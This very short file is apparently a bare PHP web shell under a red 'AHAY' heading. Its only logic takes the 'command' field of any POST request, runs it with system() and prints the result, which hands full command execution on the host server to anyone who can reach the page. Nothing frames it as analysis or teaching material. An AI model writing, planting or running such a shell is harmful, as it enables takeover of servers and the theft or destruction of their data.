<h1 color="red">AHAY





if($_SERVER["REQUEST_METHOD"] == "POST"){
echo system($_POST["command"]);
}